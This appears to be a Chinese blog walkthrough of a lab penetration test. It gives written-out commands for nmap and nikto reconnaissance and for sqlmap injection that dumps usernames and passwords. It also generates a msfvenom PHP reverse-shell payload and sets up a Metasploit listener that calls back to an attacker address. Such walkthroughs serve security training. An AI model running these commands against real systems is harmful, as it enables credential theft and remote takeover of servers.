• SQL注入(get)


    信息探测
    
    扫描主机服务信息以及服务版本
    
    nmap -sV 192.168.101.50
    
    快速扫描全部信息
    
    nmap -T4 -A -v 192.168.101.50
    
    扫描敏感信息
    
    nikto -host http://192.168.101.50:80
    
    深入挖掘
    
    分析nmap、nikto扫描结果,并对结果进行分析
    使用浏览器打开http://192.168.101.50:80
    
    漏洞扫描
    
    使用web漏洞扫描器owasp-zap(ZAP)
    打开之后选择Automated Scan,然后输入目标ip开始进行攻击,等待GET信息返回完毕
    然后查看是否可以进行sql注入
    
    使用sqlmap利用sql注入漏洞
    
    sudo sqlmap -u "http://192.168.101.50/cat.php?id=3"		查看id是否具有sql漏洞
    
    sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -dbs 		查看数据库名
    
    sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" --tables	查看对应数据库中的表
    
    sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" --columns 	查看对应字段
    
    sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" -C 'login,password' --dump	查看对应字段的值
    
    (也可以直接尝试sqlmap -u-url -os-shell直接获取shell)
    
    得到用户名和密码后重新返回http://192.168.101.50:80使用用户名和密码登录
    
    
    
    生成反弹shell
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.51 lport=4444 -f raw 
    
    gedit shellcd.php
    (将生成的php代码拷贝到shellcd.php中)
    
    上传shell反弹监听
    
    打开msfconsole
    msfconsole
    
    启动监听模式
    use exploit/multi/handler
    set payload linux/x86/meterpreter/reverse_tcp
    set lhost 192.168.101.51
    set lport 4444
    run
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
  • 相关阅读:
    Pytorch实战[使用VGG16实现图片分类]
    ES6之无命名参数
    Go-命令行参数解析
    【python 游戏】闲的无聊?那就和博主一起来滑雪吧~
    python程序编写
    电池集成充电解决方案提供商【XCharge Group】获得壳牌风险投资
    mysql主从工作原理、搭建
    jQuery
    python+pytest接口自动化(2)-HTTP协议基础
    Hibernate 配置文件详解
  • 原文地址:https://blog.csdn.net/weixin_44774550/article/details/133244372